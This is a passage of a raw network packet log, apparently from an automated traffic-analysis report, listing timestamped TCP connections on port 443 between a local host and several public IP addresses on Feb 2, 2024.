                                                                                                                          Feb 2, 2024 20:18:00.630850077 CET4434980913.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.644725084 CET4434981013.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.644752979 CET4434981013.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.644833088 CET4434981013.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.644831896 CET49810443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.644901991 CET49810443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.645677090 CET49810443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.645695925 CET4434981013.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.848598957 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.848932028 CET49811443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.848961115 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.849476099 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.849785089 CET49811443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.849875927 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.849975109 CET49811443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.877417088 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.877741098 CET49812443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.877759933 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.878272057 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.878582954 CET49812443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.878669024 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.878774881 CET49812443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.897916079 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.921946049 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.934386969 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.934719086 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.934736967 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.935908079 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.936232090 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.936404943 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.936413050 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.954652071 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.954783916 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.954859972 CET49811443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.955524921 CET49811443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.955545902 CET4434981113.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.976466894 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.976475954 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.981671095 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.981736898 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.981797934 CET49812443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.981801987 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:00.981858969 CET49812443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.982342005 CET49812443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:00.982359886 CET4434981213.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142371893 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142431974 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142452955 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142493010 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142502069 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.142524958 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142543077 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142549038 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.142575979 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.142591000 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.142649889 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142709970 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.142724991 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142813921 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:01.142862082 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.143862009 CET49813443192.168.2.1613.107.246.41
                                                                                                                          Feb 2, 2024 20:18:01.143882036 CET4434981313.107.246.41192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:02.557974100 CET4434979813.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:02.558125019 CET4434979813.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:02.558223009 CET49798443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:02.603105068 CET4434979913.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:02.603208065 CET4434979913.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:02.603275061 CET49799443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:04.536648989 CET49798443192.168.2.1613.107.213.40
                                                                                                                          Feb 2, 2024 20:18:04.536685944 CET49799443192.168.2.1613.107.213.51
                                                                                                                          Feb 2, 2024 20:18:04.536720037 CET4434979813.107.213.40192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:04.536770105 CET4434979913.107.213.51192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:05.439322948 CET44349764104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:05.439533949 CET44349764104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:05.439732075 CET49764443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:06.544665098 CET49764443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:06.544704914 CET44349764104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.140305996 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.140352011 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.140466928 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.141722918 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.141736031 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.506388903 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.506548882 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.511848927 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.511861086 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.512358904 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.521984100 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.565897942 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.883328915 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.883358955 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.883378983 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.883455992 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.883476973 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.883549929 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.883569956 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.883598089 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.894630909 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.894630909 CET49817443192.168.2.1620.12.23.50
                                                                                                                          Feb 2, 2024 20:18:17.894654989 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:17.894669056 CET4434981720.12.23.50192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.441617012 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.441711903 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.441858053 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.445226908 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.445267916 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.470992088 CET49759443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.517899036 CET4434975935.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.679130077 CET4434975935.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.679337978 CET4434975935.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.679425001 CET49759443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.680188894 CET49759443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.680238008 CET4434975935.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.680267096 CET49759443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.680313110 CET49759443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.685601950 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:22.685687065 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.685782909 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:22.686044931 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:22.686098099 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.857835054 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.858181000 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.858206034 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.858669043 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.858953953 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.859055042 CET4434981835.181.229.138192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.903609037 CET49818443192.168.2.1635.181.229.138
                                                                                                                          Feb 2, 2024 20:18:22.904293060 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.904608965 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:22.904686928 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.905062914 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.905364037 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:22.905442953 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:22.905505896 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:22.949908018 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.110614061 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.110810041 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.111053944 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:23.162188053 CET49819443192.168.2.16162.241.124.47
                                                                                                                          Feb 2, 2024 20:18:23.162230015 CET44349819162.241.124.47192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.171505928 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.171540022 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.171617985 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.172151089 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.172255039 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.172333002 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.172710896 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.172724962 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.173070908 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.173105955 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.434819937 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.435193062 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.435236931 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.435585976 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.436007977 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.436084032 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.436207056 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.436537027 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.436970949 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.437036037 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.437428951 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.437828064 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.437933922 CET44349821104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.477936983 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.479379892 CET49821443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.805460930 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.805538893 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.805907965 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.807585001 CET49820443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:23.807607889 CET44349820104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.808881044 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:23.808908939 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:23.809010029 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:23.809276104 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:23.809292078 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.053956032 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.054702997 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:24.054728031 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.055119038 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.055526972 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:24.055581093 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.055798054 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:24.055834055 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.517608881 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.517796040 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.517982960 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:24.519747019 CET49822443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:24.519783020 CET44349822172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.520766020 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:24.520859003 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.520962000 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:24.521243095 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:24.521275997 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.765908003 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.786123037 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:24.786190033 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.786521912 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.788770914 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:24.788856983 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:24.788919926 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:24.833923101 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.174468040 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.174776077 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.174969912 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:25.174993992 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.175060987 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:25.177062988 CET49823443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:25.177093029 CET44349823104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.178355932 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.178440094 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.178534031 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.178894997 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.178930998 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.433665037 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.433968067 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.433999062 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.434413910 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.434684038 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.434756041 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.434880972 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.434916973 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886444092 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886528015 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886549950 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886626959 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886632919 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.886648893 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886667967 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.886676073 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.886729002 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.886734009 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887214899 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887259007 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887274027 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.887279034 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887325048 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.887330055 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887720108 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887746096 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887767076 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.887773037 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.887825012 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.912785053 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.912869930 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.912961960 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.912971020 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913193941 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913224936 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913249016 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.913254023 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913297892 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.913697004 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913753033 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913770914 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913801908 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.913806915 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.913849115 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.914485931 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.914531946 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.914560080 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.914577007 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.914582014 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.914623976 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.914628029 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.915397882 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.915445089 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.915451050 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.915455103 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.915497065 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.915502071 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.916146994 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.916194916 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.916198969 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.916227102 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.916275024 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.916687012 CET49824443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.916697979 CET44349824172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.925506115 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:25.925586939 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.925708055 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:25.928323030 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:25.928354025 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.929176092 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.929260015 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.929420948 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.929795980 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.929816961 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.929899931 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.931118965 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.931152105 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:25.931529045 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:25.931552887 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.172719002 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.172996044 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.173015118 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.173523903 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.174072027 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.174154043 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.174340963 CET49825443192.168.2.16104.21.85.189
                                                                                                                          Feb 2, 2024 20:18:26.174370050 CET44349825104.21.85.189192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.206537962 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.206919909 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.206969023 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.207510948 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.207813978 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.207911015 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.207958937 CET49826443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.208003998 CET44349826172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.208798885 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.208980083 CET49827443192.168.2.16172.67.209.71
                                                                                                                          Feb 2, 2024 20:18:26.208997011 CET44349827172.67.209.71192.168.2.16
                                                                                                                          Feb 2, 2024 20:18:26.209472895 CET44349827172.67.209.71192.168.2.16
